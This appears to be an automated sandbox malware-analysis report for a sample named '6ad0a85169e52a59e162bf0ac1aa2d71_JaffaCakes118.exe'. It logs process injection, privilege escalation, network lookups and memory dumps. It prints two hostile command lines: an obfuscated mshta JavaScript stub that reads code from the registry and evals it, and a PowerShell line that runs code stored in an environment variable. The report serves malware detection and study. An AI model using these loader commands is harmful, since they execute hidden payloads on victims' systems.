Suspicious use of SetThreadContext

Description Indicator Process Target
PID 232 set thread context of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 232 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 232 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 232 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 232 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 232 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 232 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 232 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 232 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 232 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 232 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 232 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 1308 wrote to memory of 3620 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1308 wrote to memory of 3620 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1308 wrote to memory of 3620 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe

C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:tBxbe6rS="FNyVRH";gH4=new%20ActiveXObject("WScript.Shell");ct81TWZNhd="oktYhmiD";zpS93h=gH4.RegRead("HKLM\\software\\Wow6432Node\\994TReLaV\\v1xweq17ec");RUdr4xGH="Oy";eval(zpS93h);UwChz7WGV="6";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:waxpw

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 149.177.190.20.in-addr.arpa udp
NL 23.62.61.75:443 www.bing.com tcp
US 8.8.8.8:53 75.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 104.246.116.51.in-addr.arpa udp

Files

memory/232-1-0x0000000000B20000-0x0000000000B24000-memory.dmp

memory/3008-2-0x0000000000400000-0x0000000001400000-memory.dmp

memory/3008-4-0x000000000D850000-0x000000000D910000-memory.dmp

memory/3008-9-0x000000000D850000-0x000000000D910000-memory.dmp

memory/3008-10-0x000000000D850000-0x000000000D910000-memory.dmp

memory/3008-8-0x000000000D850000-0x000000000D910000-memory.dmp

memory/3008-7-0x000000000D850000-0x000000000D910000-memory.dmp

memory/3008-6-0x000000000D850000-0x000000000D910000-memory.dmp

memory/3008-5-0x000000000D850000-0x000000000D910000-memory.dmp

memory/3008-3-0x0000000000400000-0x0000000001400000-memory.dmp

memory/3620-12-0x0000000002D80000-0x0000000002DB6000-memory.dmp

memory/3620-13-0x00000000057E0000-0x0000000005E08000-memory.dmp

memory/3620-14-0x00000000056E0000-0x0000000005702000-memory.dmp

memory/3620-15-0x0000000005EA0000-0x0000000005F06000-memory.dmp

memory/3620-16-0x0000000005F80000-0x0000000005FE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vkm3p2jd.fhd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3620-26-0x0000000005FF0000-0x0000000006344000-memory.dmp

memory/3620-27-0x00000000064A0000-0x00000000064BE000-memory.dmp

memory/3620-28-0x00000000064F0000-0x000000000653C000-memory.dmp

memory/3620-29-0x0000000007D00000-0x000000000837A000-memory.dmp

memory/3620-30-0x00000000069C0000-0x00000000069DA000-memory.dmp

memory/3008-31-0x0000000000400000-0x0000000000435000-memory.dmp

memory/3008-34-0x000000000D850000-0x000000000D910000-memory.dmp